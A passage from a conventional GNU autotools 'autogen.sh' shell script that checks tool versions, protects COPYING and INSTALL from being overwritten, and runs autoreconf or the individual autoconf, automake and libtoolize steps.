elif [ $_min_patch -eq $_cur_patch ] ; then
return 0
fi
fi
fi
return 1
}
######################################
# LOCATE_CONFIGURE_TEMPLATE FUNCTION #
######################################
locate_configure_template ( ) {
_pwd="`pwd`"
if test -f "./configure.ac" ; then
echo "./configure.ac"
elif test -f "./configure.in" ; then
echo "./configure.in"
elif test -f "$_pwd/configure.ac" ; then
echo "$_pwd/configure.ac"
elif test -f "$_pwd/configure.in" ; then
echo "$_pwd/configure.in"
elif test -f "$PATH_TO_AUTOGEN/configure.ac" ; then
echo "$PATH_TO_AUTOGEN/configure.ac"
elif test -f "$PATH_TO_AUTOGEN/configure.in" ; then
echo "$PATH_TO_AUTOGEN/configure.in"
fi
}
##################
# argument check #
##################
ARGS="$*"
PATH_TO_AUTOGEN="`dirname $0`"
NAME_OF_AUTOGEN="`basename $0`"
AUTOGEN_SH="$PATH_TO_AUTOGEN/$NAME_OF_AUTOGEN"
LIBTOOL_M4="${PATH_TO_AUTOGEN}/misc/libtool.m4"
if [ "x$HELP" = "x" ] ; then
HELP=no
fi
if [ "x$QUIET" = "x" ] ; then
QUIET=no
fi
if [ "x$VERBOSE" = "x" ] ; then
VERBOSE=no
fi
if [ "x$VERSION_ONLY" = "x" ] ; then
VERSION_ONLY=no
fi
if [ "x$AUTORECONF_OPTIONS" = "x" ] ; then
AUTORECONF_OPTIONS="-i -f"
fi
if [ "x$AUTOCONF_OPTIONS" = "x" ] ; then
AUTOCONF_OPTIONS="-f"
fi
if [ "x$AUTOMAKE_OPTIONS" = "x" ] ; then
AUTOMAKE_OPTIONS="-a -c -f"
fi
ALT_AUTOMAKE_OPTIONS="-a -c"
if [ "x$LIBTOOLIZE_OPTIONS" = "x" ] ; then
LIBTOOLIZE_OPTIONS="--automake -c -f"
fi
ALT_LIBTOOLIZE_OPTIONS="--automake --copy --force"
if [ "x$ACLOCAL_OPTIONS" = "x" ] ; then
ACLOCAL_OPTIONS=""
fi
if [ "x$AUTOHEADER_OPTIONS" = "x" ] ; then
AUTOHEADER_OPTIONS=""
fi
for arg in $ARGS ; do
case "x$arg" in
x--help) HELP=yes ;;
x-[hH]) HELP=yes ;;
x--quiet) QUIET=yes ;;
x-[qQ]) QUIET=yes ;;
x--verbose) VERBOSE=yes ;;
x-[vV]) VERBOSE=yes ;;
x--version) VERSION_ONLY=yes ;;
*)
echo "Unknown option: $arg"
echo
usage
exit 1
;;
esac
done
#####################
# environment check #
#####################
# sanity check before recursions potentially begin
if [ ! -f "$AUTOGEN_SH" ] ; then
echo "INTERNAL ERROR: $AUTOGEN_SH does not exist"
if [ ! "x$0" = "x$AUTOGEN_SH" ] ; then
echo "INTERNAL ERROR: dirname/basename inconsistency: $0 != $AUTOGEN_SH"
fi
exit 1
fi
# force locale setting to C so things like date output as expected
LC_ALL=C
# commands that this script expects
for __cmd in echo head tail pwd ; do
echo "test" | $__cmd > /dev/null 2>&1
if [ $? != 0 ] ; then
echo "INTERNAL ERROR: '${__cmd}' command is required"
exit 2
fi
done
echo "test" | grep "test" > /dev/null 2>&1
if test ! x$? = x0 ; then
echo "INTERNAL ERROR: grep command is required"
exit 1
fi
echo "test" | sed "s/test/test/" > /dev/null 2>&1
if test ! x$? = x0 ; then
echo "INTERNAL ERROR: sed command is required"
exit 1
fi
# determine the behavior of echo
case `echo "testing\c"; echo 1,2,3`,`echo -n testing; echo 1,2,3` in
*c*,-n*) ECHO_N= ECHO_C='
' ECHO_T=' ' ;;
*c*,* ) ECHO_N=-n ECHO_C= ECHO_T= ;;
*) ECHO_N= ECHO_C='\c' ECHO_T= ;;
esac
# determine the behavior of head
case "x`echo 'head' | head -n 1 2>&1`" in
*xhead*) HEAD_N="n " ;;
*) HEAD_N="" ;;
esac
# determine the behavior of tail
case "x`echo 'tail' | tail -n 1 2>&1`" in
*xtail*) TAIL_N="n " ;;
*) TAIL_N="" ;;
esac
VERBOSE_ECHO=:
ECHO=:
if [ "x$QUIET" = "xyes" ] ; then
if [ "x$VERBOSE" = "xyes" ] ; then
echo "Verbose output quelled by quiet option. Further output disabled."
fi
else
ECHO=echo
if [ "x$VERBOSE" = "xyes" ] ; then
echo "Verbose output enabled"
VERBOSE_ECHO=echo
fi
fi
# allow a recursive run to disable further recursions
if [ "x$RUN_RECURSIVE" = "x" ] ; then
RUN_RECURSIVE=yes
fi
################################################
# check for help arg and bypass version checks #
################################################
if [ "x`echo $ARGS | sed 's/.*[hH][eE][lL][pP].*/help/'`" = "xhelp" ] ; then
HELP=yes
fi
if [ "x$HELP" = "xyes" ] ; then
usage
$ECHO "---"
$ECHO "Help was requested. No preparation or configuration will be performed."
exit 0
fi
#######################
# set up signal traps #
#######################
untrap_abnormal ( ) {
for sig in 1 2 13 15; do
trap - $sig
done
}
# do this cleanup whenever we exit.
trap '
# start from the root
if test -d "$START_PATH" ; then
cd "$START_PATH"
fi
# restore/delete backup files
if test "x$PFC_INIT" = "x1" ; then
recursive_restore
fi
' 0
# trap SIGHUP (1), SIGINT (2), SIGPIPE (13), SIGTERM (15)
for sig in 1 2 13 15; do
trap '
$ECHO ""
$ECHO "Aborting $NAME_OF_AUTOGEN: caught signal '$sig'"
# start from the root
if test -d "$START_PATH" ; then
cd "$START_PATH"
fi
# clean up on abnormal exit
$VERBOSE_ECHO "rm -rf autom4te.cache"
rm -rf autom4te.cache
if test -f "acinclude.m4.$$.backup" ; then
$VERBOSE_ECHO "cat acinclude.m4.$$.backup > acinclude.m4"
chmod u+w acinclude.m4
cat acinclude.m4.$$.backup > acinclude.m4
$VERBOSE_ECHO "rm -f acinclude.m4.$$.backup"
rm -f acinclude.m4.$$.backup
fi
{ (exit 1); exit 1; }
' $sig
done
#############################
# look for a configure file #
#############################
if [ "x$CONFIGURE" = "x" ] ; then
CONFIGURE="`locate_configure_template`"
if [ ! "x$CONFIGURE" = "x" ] ; then
$VERBOSE_ECHO "Found a configure template: $CONFIGURE"
fi
else
$ECHO "Using CONFIGURE environment variable override: $CONFIGURE"
fi
if [ "x$CONFIGURE" = "x" ] ; then
if [ "x$VERSION_ONLY" = "xyes" ] ; then
CONFIGURE=/dev/null
else
$ECHO
$ECHO "A configure.ac or configure.in file could not be located implying"
$ECHO "that the GNU Build System is at least not used in this directory. In"
$ECHO "any case, there is nothing to do here without one of those files."
$ECHO
$ECHO "ERROR: No configure.in or configure.ac file found in `pwd`"
exit 1
fi
fi
####################
# get project name #
####################
if [ "x$PROJECT" = "x" ] ; then
PROJECT="`grep AC_INIT $CONFIGURE | grep -v '.*#.*AC_INIT' | tail -${TAIL_N}1 | sed 's/^[ ]*AC_INIT(\([^,)]*\).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
if [ "x$PROJECT" = "xAC_INIT" ] ; then
# projects might be using the older/deprecated arg-less AC_INIT .. look for AM_INIT_AUTOMAKE instead
PROJECT="`grep AM_INIT_AUTOMAKE $CONFIGURE | grep -v '.*#.*AM_INIT_AUTOMAKE' | tail -${TAIL_N}1 | sed 's/^[ ]*AM_INIT_AUTOMAKE(\([^,)]*\).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
fi
if [ "x$PROJECT" = "xAM_INIT_AUTOMAKE" ] ; then
PROJECT="project"
fi
if [ "x$PROJECT" = "x" ] ; then
PROJECT="project"
fi
else
$ECHO "Using PROJECT environment variable override: $PROJECT"
fi
$ECHO "Preparing the $PROJECT build system...please wait"
$ECHO
########################
# check for autoreconf #
########################
HAVE_AUTORECONF=no
if [ "x$AUTORECONF" = "x" ] ; then
for AUTORECONF in autoreconf ; do
$VERBOSE_ECHO "Checking autoreconf version: $AUTORECONF --version"
$AUTORECONF --version > /dev/null 2>&1
if [ $? = 0 ] ; then
HAVE_AUTORECONF=yes
break
fi
done
else
HAVE_AUTORECONF=yes
$ECHO "Using AUTORECONF environment variable override: $AUTORECONF"
fi
##########################
# autoconf version check #
##########################
_acfound=no
if [ "x$AUTOCONF" = "x" ] ; then
for AUTOCONF in autoconf ; do
$VERBOSE_ECHO "Checking autoconf version: $AUTOCONF --version"
$AUTOCONF --version > /dev/null 2>&1
if [ $? = 0 ] ; then
_acfound=yes
break
fi
done
else
_acfound=yes
$ECHO "Using AUTOCONF environment variable override: $AUTOCONF"
fi
_report_error=no
if [ ! "x$_acfound" = "xyes" ] ; then
$ECHO "ERROR: Unable to locate GNU Autoconf."
_report_error=yes
else
_version="`$AUTOCONF --version | head -${HEAD_N}1 | sed 's/[^0-9]*\([0-9\.][0-9\.]*\)/\1/'`"
if [ "x$_version" = "x" ] ; then
_version="0.0.0"
fi
$ECHO "Found GNU Autoconf version $_version"
version_check "$AUTOCONF_VERSION" "$_version"
if [ $? -ne 0 ] ; then
_report_error=yes
fi
fi
if [ "x$_report_error" = "xyes" ] ; then
version_error "$AUTOCONF_VERSION" "GNU Autoconf"
exit 1
fi
##########################
# automake version check #
##########################
_amfound=no
if [ "x$AUTOMAKE" = "x" ] ; then
for AUTOMAKE in automake ; do
$VERBOSE_ECHO "Checking automake version: $AUTOMAKE --version"
$AUTOMAKE --version > /dev/null 2>&1
if [ $? = 0 ] ; then
_amfound=yes
break
fi
done
else
_amfound=yes
$ECHO "Using AUTOMAKE environment variable override: $AUTOMAKE"
fi
_report_error=no
if [ ! "x$_amfound" = "xyes" ] ; then
$ECHO
$ECHO "ERROR: Unable to locate GNU Automake."
_report_error=yes
else
_version="`$AUTOMAKE --version | head -${HEAD_N}1 | sed 's/[^0-9]*\([0-9\.][0-9\.]*\)/\1/'`"
if [ "x$_version" = "x" ] ; then
_version="0.0.0"
fi
$ECHO "Found GNU Automake version $_version"
version_check "$AUTOMAKE_VERSION" "$_version"
if [ $? -ne 0 ] ; then
_report_error=yes
fi
fi
if [ "x$_report_error" = "xyes" ] ; then
version_error "$AUTOMAKE_VERSION" "GNU Automake"
exit 1
fi
########################
# check for libtoolize #
########################
HAVE_LIBTOOLIZE=yes
HAVE_ALT_LIBTOOLIZE=no
_ltfound=no
if [ "x$LIBTOOLIZE" = "x" ] ; then
LIBTOOLIZE=libtoolize
$VERBOSE_ECHO "Checking libtoolize version: $LIBTOOLIZE --version"
$LIBTOOLIZE --version > /dev/null 2>&1
if [ ! $? = 0 ] ; then
HAVE_LIBTOOLIZE=no
$ECHO
if [ "x$HAVE_AUTORECONF" = "xno" ] ; then
$ECHO "Warning: libtoolize does not appear to be available."
else
$ECHO "Warning: libtoolize does not appear to be available. This means that"
$ECHO "the automatic build preparation via autoreconf will probably not work."
$ECHO "Preparing the build by running each step individually, however, should"
$ECHO "work and will be done automatically for you if autoreconf fails."
fi
# look for some alternates
for tool in glibtoolize libtoolize15 libtoolize14 libtoolize13 ; do
$VERBOSE_ECHO "Checking libtoolize alternate: $tool --version"
_glibtoolize="`$tool --version > /dev/null 2>&1`"
if [ $? = 0 ] ; then
$VERBOSE_ECHO "Found $tool --version"
_glti="`which $tool`"
if [ "x$_glti" = "x" ] ; then
$VERBOSE_ECHO "Cannot find $tool with which"
continue;
fi
if test ! -f "$_glti" ; then
$VERBOSE_ECHO "Cannot use $tool, $_glti is not a file"
continue;
fi
_gltidir="`dirname $_glti`"
if [ "x$_gltidir" = "x" ] ; then
$VERBOSE_ECHO "Cannot find $tool path with dirname of $_glti"
continue;
fi
if test ! -d "$_gltidir" ; then
$VERBOSE_ECHO "Cannot use $tool, $_gltidir is not a directory"
continue;
fi
HAVE_ALT_LIBTOOLIZE=yes
LIBTOOLIZE="$tool"
$ECHO
$ECHO "Fortunately, $tool was found which means that your system may simply"
$ECHO "have a non-standard or incomplete GNU Autotools install. If you have"
$ECHO "sufficient system access, it may be possible to quell this warning by"
$ECHO "running:"
$ECHO
sudo -V > /dev/null 2>&1
if [ $? = 0 ] ; then
$ECHO " sudo ln -s $_glti $_gltidir/libtoolize"
$ECHO
else
$ECHO " ln -s $_glti $_gltidir/libtoolize"
$ECHO
$ECHO "Run that as root or with proper permissions to the $_gltidir directory"
$ECHO
fi
_ltfound=yes
break
fi
done
else
_ltfound=yes
fi
else
_ltfound=yes
$ECHO "Using LIBTOOLIZE environment variable override: $LIBTOOLIZE"
fi
############################
# libtoolize version check #
############################
_report_error=no
if [ ! "x$_ltfound" = "xyes" ] ; then
$ECHO
$ECHO "ERROR: Unable to locate GNU Libtool."
_report_error=yes
else
_version="`$LIBTOOLIZE --version | head -${HEAD_N}1 | sed 's/[^0-9]*\([0-9\.][0-9\.]*\)/\1/'`"
if [ "x$_version" = "x" ] ; then
_version="0.0.0"
fi
$ECHO "Found GNU Libtool version $_version"
version_check "$LIBTOOL_VERSION" "$_version"
if [ $? -ne 0 ] ; then
_report_error=yes
fi
fi
if [ "x$_report_error" = "xyes" ] ; then
version_error "$LIBTOOL_VERSION" "GNU Libtool"
exit 1
fi
#####################
# check for aclocal #
#####################
if [ "x$ACLOCAL" = "x" ] ; then
for ACLOCAL in aclocal ; do
$VERBOSE_ECHO "Checking aclocal version: $ACLOCAL --version"
$ACLOCAL --version > /dev/null 2>&1
if [ $? = 0 ] ; then
break
fi
done
else
$ECHO "Using ACLOCAL environment variable override: $ACLOCAL"
fi
########################
# check for autoheader #
########################
if [ "x$AUTOHEADER" = "x" ] ; then
for AUTOHEADER in autoheader ; do
$VERBOSE_ECHO "Checking autoheader version: $AUTOHEADER --version"
$AUTOHEADER --version > /dev/null 2>&1
if [ $? = 0 ] ; then
break
fi
done
else
$ECHO "Using AUTOHEADER environment variable override: $AUTOHEADER"
fi
#########################
# check if version only #
#########################
$VERBOSE_ECHO "Checking whether to only output version information"
if [ "x$VERSION_ONLY" = "xyes" ] ; then
$ECHO
ident
$ECHO "---"
$ECHO "Version requested. No preparation or configuration will be performed."
exit 0
fi
#################################
# PROTECT_FROM_CLOBBER FUNCTION #
#################################
protect_from_clobber ( ) {
PFC_INIT=1
# protect COPYING & INSTALL from overwrite by automake. the
# automake force option will (inappropriately) ignore the existing
# contents of a COPYING and/or INSTALL files (depending on the
# version) instead of just forcing *missing* files like it does
# for AUTHORS, NEWS, and README. this is broken but extremely
# prevalent behavior, so we protect against it by keeping a backup
# of the file that can later be restored.
if test -f COPYING ; then
if test -f COPYING.$$.protect_from_automake.backup ; then
$VERBOSE_ECHO "Already backed up COPYING in `pwd`"
else
$VERBOSE_ECHO "Backing up COPYING in `pwd`"
$VERBOSE_ECHO "cp -p COPYING COPYING.$$.protect_from_automake.backup"
cp -p COPYING COPYING.$$.protect_from_automake.backup
fi
fi
if test -f INSTALL ; then
if test -f INSTALL.$$.protect_from_automake.backup ; then
$VERBOSE_ECHO "Already backed up INSTALL in `pwd`"
else
$VERBOSE_ECHO "Backing up INSTALL in `pwd`"
$VERBOSE_ECHO "cp -p INSTALL INSTALL.$$.protect_from_automake.backup"
cp -p INSTALL INSTALL.$$.protect_from_automake.backup
fi
fi
}
##############################
# RECURSIVE_PROTECT FUNCTION #
##############################
recursive_protect ( ) {
# for projects using recursive configure, run the build
# preparation steps for the subdirectories. this function assumes
# START_PATH was set to pwd before recursion begins so that
# relative paths work.
# git 'r done, protect COPYING and INSTALL from being clobbered
protect_from_clobber
if test -d autom4te.cache ; then
$VERBOSE_ECHO "Found an autom4te.cache directory, deleting it"
$VERBOSE_ECHO "rm -rf autom4te.cache"
rm -rf autom4te.cache
fi
# find configure template
_configure="`locate_configure_template`"
if [ "x$_configure" = "x" ] ; then
return
fi
# $VERBOSE_ECHO "Looking for configure template found `pwd`/$_configure"
# look for subdirs
# $VERBOSE_ECHO "Looking for subdirs in `pwd`"
_det_config_subdirs="`grep AC_CONFIG_SUBDIRS $_configure | grep -v '.*#.*AC_CONFIG_SUBDIRS' | sed 's/^[ ]*AC_CONFIG_SUBDIRS(\(.*\)).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
CHECK_DIRS=""
for dir in $_det_config_subdirs ; do
if test -d "`pwd`/$dir" ; then
CHECK_DIRS="$CHECK_DIRS \"`pwd`/$dir\""
fi
done
# process subdirs
if [ ! "x$CHECK_DIRS" = "x" ] ; then
$VERBOSE_ECHO "Recursively scanning the following directories:"
$VERBOSE_ECHO " $CHECK_DIRS"
for dir in $CHECK_DIRS ; do
$VERBOSE_ECHO "Protecting files from automake in $dir"
cd "$START_PATH"
eval "cd $dir"
# recursively git 'r done
recursive_protect
done
fi
} # end of recursive_protect
#############################
# RESTORE_CLOBBERED FUNCION #
#############################
restore_clobbered ( ) {
# The automake (and autoreconf by extension) -f/--force-missing
# option may overwrite COPYING and INSTALL even if they do exist.
# Here we restore the files if necessary.
spacer=no
# COPYING
if test -f COPYING.$$.protect_from_automake.backup ; then
if test -f COPYING ; then
# compare entire content, restore if needed
if test "x`cat COPYING`" != "x`cat COPYING.$$.protect_from_automake.backup`" ; then
if test "x$spacer" = "xno" ; then
$VERBOSE_ECHO
spacer=yes
fi
# restore the backup
$VERBOSE_ECHO "Restoring COPYING from backup (automake -f likely clobbered it)"
$VERBOSE_ECHO "rm -f COPYING"
rm -f COPYING
$VERBOSE_ECHO "mv COPYING.$$.protect_from_automake.backup COPYING"
mv COPYING.$$.protect_from_automake.backup COPYING
fi # check contents
elif test -f COPYING.$$.protect_from_automake.backup ; then
$VERBOSE_ECHO "mv COPYING.$$.protect_from_automake.backup COPYING"
mv COPYING.$$.protect_from_automake.backup COPYING
fi # -f COPYING
# just in case
$VERBOSE_ECHO "rm -f COPYING.$$.protect_from_automake.backup"
rm -f COPYING.$$.protect_from_automake.backup
fi # -f COPYING.$$.protect_from_automake.backup
# INSTALL
if test -f INSTALL.$$.protect_from_automake.backup ; then
if test -f INSTALL ; then
# compare entire content, restore if needed
if test "x`cat INSTALL`" != "x`cat INSTALL.$$.protect_from_automake.backup`" ; then
if test "x$spacer" = "xno" ; then
$VERBOSE_ECHO
spacer=yes
fi
# restore the backup
$VERBOSE_ECHO "Restoring INSTALL from backup (automake -f likely clobbered it)"
$VERBOSE_ECHO "rm -f INSTALL"
rm -f INSTALL
$VERBOSE_ECHO "mv INSTALL.$$.protect_from_automake.backup INSTALL"
mv INSTALL.$$.protect_from_automake.backup INSTALL
fi # check contents
elif test -f INSTALL.$$.protect_from_automake.backup ; then
$VERBOSE_ECHO "mv INSTALL.$$.protect_from_automake.backup INSTALL"
mv INSTALL.$$.protect_from_automake.backup INSTALL
fi # -f INSTALL
# just in case
$VERBOSE_ECHO "rm -f INSTALL.$$.protect_from_automake.backup"
rm -f INSTALL.$$.protect_from_automake.backup
fi # -f INSTALL.$$.protect_from_automake.backup
CONFIGURE="`locate_configure_template`"
if [ "x$CONFIGURE" = "x" ] ; then
return
fi
_aux_dir="`grep AC_CONFIG_AUX_DIR $CONFIGURE | grep -v '.*#.*AC_CONFIG_AUX_DIR' | tail -${TAIL_N}1 | sed 's/^[ ]*AC_CONFIG_AUX_DIR(\(.*\)).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
if test ! -d "$_aux_dir" ; then
_aux_dir=.
fi
for file in config.guess config.sub ltmain.sh ; do
if test -f "${_aux_dir}/${file}" ; then
$VERBOSE_ECHO "rm -f \"${_aux_dir}/${file}.backup\""
rm -f "${_aux_dir}/${file}.backup"
fi
done
} # end of restore_clobbered
##############################
# RECURSIVE_RESTORE FUNCTION #
##############################
recursive_restore ( ) {
# restore COPYING and INSTALL from backup if they were clobbered
# for each directory recursively.
# git 'r undone
restore_clobbered
# find configure template
_configure="`locate_configure_template`"
if [ "x$_configure" = "x" ] ; then
return
fi
# look for subdirs
_det_config_subdirs="`grep AC_CONFIG_SUBDIRS $_configure | grep -v '.*#.*AC_CONFIG_SUBDIRS' | sed 's/^[ ]*AC_CONFIG_SUBDIRS(\(.*\)).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
CHECK_DIRS=""
for dir in $_det_config_subdirs ; do
if test -d "`pwd`/$dir" ; then
CHECK_DIRS="$CHECK_DIRS \"`pwd`/$dir\""
fi
done
# process subdirs
if [ ! "x$CHECK_DIRS" = "x" ] ; then
$VERBOSE_ECHO "Recursively scanning the following directories:"
$VERBOSE_ECHO " $CHECK_DIRS"
for dir in $CHECK_DIRS ; do
$VERBOSE_ECHO "Checking files for automake damage in $dir"
cd "$START_PATH"
eval "cd $dir"
# recursively git 'r undone
recursive_restore
done
fi
} # end of recursive_restore
#######################
# INITIALIZE FUNCTION #
#######################
initialize ( ) {
# this routine performs a variety of directory-specific
# initializations. some are sanity checks, some are preventive,
# and some are necessary setup detection.
#
# this function sets:
# CONFIGURE
# SEARCH_DIRS
# CONFIG_SUBDIRS
##################################
# check for a configure template #
##################################
CONFIGURE="`locate_configure_template`"
if [ "x$CONFIGURE" = "x" ] ; then
$ECHO
$ECHO "A configure.ac or configure.in file could not be located implying"
$ECHO "that the GNU Build System is at least not used in this directory. In"
$ECHO "any case, there is nothing to do here without one of those files."
$ECHO
$ECHO "ERROR: No configure.in or configure.ac file found in `pwd`"
exit 1
fi
#####################
# detect an aux dir #
#####################
_aux_dir="`grep AC_CONFIG_AUX_DIR $CONFIGURE | grep -v '.*#.*AC_CONFIG_AUX_DIR' | tail -${TAIL_N}1 | sed 's/^[ ]*AC_CONFIG_AUX_DIR(\(.*\)).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
if test ! -d "$_aux_dir" ; then
_aux_dir=.
else
$VERBOSE_ECHO "Detected auxillary directory: $_aux_dir"
fi
################################
# detect a recursive configure #
################################
CONFIG_SUBDIRS=""
_det_config_subdirs="`grep AC_CONFIG_SUBDIRS $CONFIGURE | grep -v '.*#.*AC_CONFIG_SUBDIRS' | sed 's/^[ ]*AC_CONFIG_SUBDIRS(\(.*\)).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
for dir in $_det_config_subdirs ; do
if test -d "`pwd`/$dir" ; then
$VERBOSE_ECHO "Detected recursive configure directory: `pwd`/$dir"
CONFIG_SUBDIRS="$CONFIG_SUBDIRS `pwd`/$dir"
fi
done
##########################################
# make sure certain required files exist #
##########################################
for file in AUTHORS COPYING ChangeLog INSTALL NEWS README ; do
if test ! -f $file ; then
$VERBOSE_ECHO "Touching ${file} since it does not exist"
touch $file
fi
done
##################################################
# make sure certain generated files do not exist #
##################################################
for file in config.guess config.sub ltmain.sh ; do
if test -f "${_aux_dir}/${file}" ; then
$VERBOSE_ECHO "mv -f \"${_aux_dir}/${file}\" \"${_aux_dir}/${file}.backup\""
mv -f "${_aux_dir}/${file}" "${_aux_dir}/${file}.backup"
fi
done
############################
# search alternate m4 dirs #
############################
SEARCH_DIRS=""
for dir in m4 ; do
if [ -d $dir ] ; then
$VERBOSE_ECHO "Found extra aclocal search directory: $dir"
SEARCH_DIRS="$SEARCH_DIRS -I $dir"
fi
done
######################################
# remove any previous build products #
######################################
if test -d autom4te.cache ; then
$VERBOSE_ECHO "Found an autom4te.cache directory, deleting it"
$VERBOSE_ECHO "rm -rf autom4te.cache"
rm -rf autom4te.cache
fi
# tcl/tk (and probably others) have a customized aclocal.m4, so can't delete it
# if test -f aclocal.m4 ; then
# $VERBOSE_ECHO "Found an aclocal.m4 file, deleting it"
# $VERBOSE_ECHO "rm -f aclocal.m4"
# rm -f aclocal.m4
# fi
} # end of initialize()
##############
# initialize #
##############
# stash path
START_PATH="`pwd`"
# Before running autoreconf or manual steps, some prep detection work
# is necessary or useful. Only needs to occur once per directory, but
# does need to traverse the entire subconfigure hierarchy to protect
# files from being clobbered even by autoreconf.
recursive_protect
# start from where we started
cd "$START_PATH"
# get ready to process
initialize
############################################
# prepare build via autoreconf or manually #
############################################
reconfigure_manually=no
if [ "x$HAVE_AUTORECONF" = "xyes" ] ; then
$ECHO
$ECHO $ECHO_N "Automatically preparing build ... $ECHO_C"
$VERBOSE_ECHO "$AUTORECONF $SEARCH_DIRS $AUTORECONF_OPTIONS"
autoreconf_output="`$AUTORECONF $SEARCH_DIRS $AUTORECONF_OPTIONS 2>&1`"
ret=$?
$VERBOSE_ECHO "$autoreconf_output"
if [ ! $ret = 0 ] ; then
if [ "x$HAVE_ALT_LIBTOOLIZE" = "xyes" ] ; then
if [ ! "x`echo \"$autoreconf_output\" | grep libtoolize | grep \"No such file or directory\"`" = "x" ] ; then
$ECHO
$ECHO "Warning: autoreconf failed but due to what is usually a common libtool"
$ECHO "misconfiguration issue. This problem is encountered on systems that"
$ECHO "have installed libtoolize under a different name without providing a"
$ECHO "symbolic link or without setting the LIBTOOLIZE environment variable."
$ECHO
$ECHO "Restarting the preparation steps with LIBTOOLIZE set to $LIBTOOLIZE"
export LIBTOOLIZE
RUN_RECURSIVE=no
export RUN_RECURSIVE
untrap_abnormal
$VERBOSE_ECHO sh $AUTOGEN_SH "$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" "$9"
sh "$AUTOGEN_SH" "$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" "$9"
exit $?
fi
fi
$ECHO "Warning: $AUTORECONF failed"
if test -f ltmain.sh ; then
$ECHO "libtoolize being run by autoreconf is not creating ltmain.sh in the auxillary directory like it should"
fi
$ECHO "Attempting to run the preparation steps individually"
reconfigure_manually=yes
fi
else
reconfigure_manually=yes
fi
############################
# LIBTOOL_FAILURE FUNCTION #
############################
libtool_failure ( ) {
# libtool is rather error-prone in comparison to the other
# autotools and this routine attempts to compensate for some
# common failures. the output after a libtoolize failure is
# parsed for an error related to AC_PROG_LIBTOOL and if found, we
# attempt to inject a project-provided libtool.m4 file.
_autoconf_output="$1"
if [ "x$RUN_RECURSIVE" = "xno" ] ; then
# we already tried the libtool.m4, don't try again
return 1
fi
if test -f "$LIBTOOL_M4" ; then
found_libtool="`$ECHO $_autoconf_output | grep AC_PROG_LIBTOOL`"
if test ! "x$found_libtool" = "x" ; then
if test -f acinclude.m4 ; then
rm -f acinclude.m4.$$.backup
$VERBOSE_ECHO "cat acinclude.m4 > acinclude.m4.$$.backup"
cat acinclude.m4 > acinclude.m4.$$.backup
fi
$VERBOSE_ECHO "cat \"$LIBTOOL_M4\" >> acinclude.m4"
chmod u+w acinclude.m4
cat "$LIBTOOL_M4" >> acinclude.m4
# don't keep doing this
RUN_RECURSIVE=no
export RUN_RECURSIVE
untrap_abnormal
$ECHO
$ECHO "Restarting the preparation steps with libtool macros in acinclude.m4"
$VERBOSE_ECHO sh $AUTOGEN_SH "$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" "$9"
sh "$AUTOGEN_SH" "$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" "$9"
exit $?
fi
fi
}
###########################
# MANUAL_AUTOGEN FUNCTION #
###########################
manual_autogen ( ) {
##################################################
# Manual preparation steps taken are as follows: #
# aclocal [-I m4] #
# libtoolize --automake -c -f #
# aclocal [-I m4] #
# autoconf -f #
# autoheader #
# automake -a -c -f #
##################################################
###########
# aclocal #
###########
$VERBOSE_ECHO "$ACLOCAL $SEARCH_DIRS $ACLOCAL_OPTIONS"
aclocal_output="`$ACLOCAL $SEARCH_DIRS $ACLOCAL_OPTIONS 2>&1`"
ret=$?
$VERBOSE_ECHO "$aclocal_output"
if [ ! $ret = 0 ] ; then $ECHO "ERROR: $ACLOCAL failed" && exit 2 ; fi
##############
# libtoolize #
##############
need_libtoolize=no
for feature in AC_PROG_LIBTOOL LT_INIT ; do
$VERBOSE_ECHO "Searching for $feature in $CONFIGURE"
found="`grep \"^$feature.*\" $CONFIGURE`"
if [ ! "x$found" = "x" ] ; then
need_libtoolize=yes
break
fi
done
if [ "x$need_libtoolize" = "xyes" ] ; then
if [ "x$HAVE_LIBTOOLIZE" = "xyes" ] ; then
$VERBOSE_ECHO "$LIBTOOLIZE $LIBTOOLIZE_OPTIONS"
libtoolize_output="`$LIBTOOLIZE $LIBTOOLIZE_OPTIONS 2>&1`"
ret=$?
$VERBOSE_ECHO "$libtoolize_output"
if [ ! $ret = 0 ] ; then $ECHO "ERROR: $LIBTOOLIZE failed" && exit 2 ; fi
else
if [ "x$HAVE_ALT_LIBTOOLIZE" = "xyes" ] ; then
$VERBOSE_ECHO "$LIBTOOLIZE $ALT_LIBTOOLIZE_OPTIONS"
libtoolize_output="`$LIBTOOLIZE $ALT_LIBTOOLIZE_OPTIONS 2>&1`"
ret=$?
$VERBOSE_ECHO "$libtoolize_output"
if [ ! $ret = 0 ] ; then $ECHO "ERROR: $LIBTOOLIZE failed" && exit 2 ; fi
fi
fi
###########
# aclocal #
###########
# re-run again as instructed by libtoolize
$VERBOSE_ECHO "$ACLOCAL $SEARCH_DIRS $ACLOCAL_OPTIONS"
aclocal_output="`$ACLOCAL $SEARCH_DIRS $ACLOCAL_OPTIONS 2>&1`"
ret=$?
$VERBOSE_ECHO "$aclocal_output"
# libtoolize might put ltmain.sh in the wrong place
if test -f ltmain.sh ; then
if test ! -f "${_aux_dir}/ltmain.sh" ; then
$ECHO
$ECHO "Warning: $LIBTOOLIZE is creating ltmain.sh in the wrong directory"
$ECHO
$ECHO "Fortunately, the problem can be worked around by simply copying the"
$ECHO "file to the appropriate location (${_aux_dir}/). This has been done for you."
$ECHO
$VERBOSE_ECHO "cp -p ltmain.sh \"${_aux_dir}/ltmain.sh\""
cp -p ltmain.sh "${_aux_dir}/ltmain.sh"
$ECHO $ECHO_N "Continuing build preparation ... $ECHO_C"
fi
fi # ltmain.sh
fi # need_libtoolize
############
# autoconf #
############
$VERBOSE_ECHO
$VERBOSE_ECHO "$AUTOCONF $AUTOCONF_OPTIONS"
autoconf_output="`$AUTOCONF $AUTOCONF_OPTIONS 2>&1`"
ret=$?
$VERBOSE_ECHO "$autoconf_output"
if [ ! $ret = 0 ] ; then
# retry without the -f and check for usage of macros that are too new
ac2_59_macros="AC_C_RESTRICT AC_INCLUDES_DEFAULT AC_LANG_ASSERT AC_LANG_WERROR AS_SET_CATFILE"
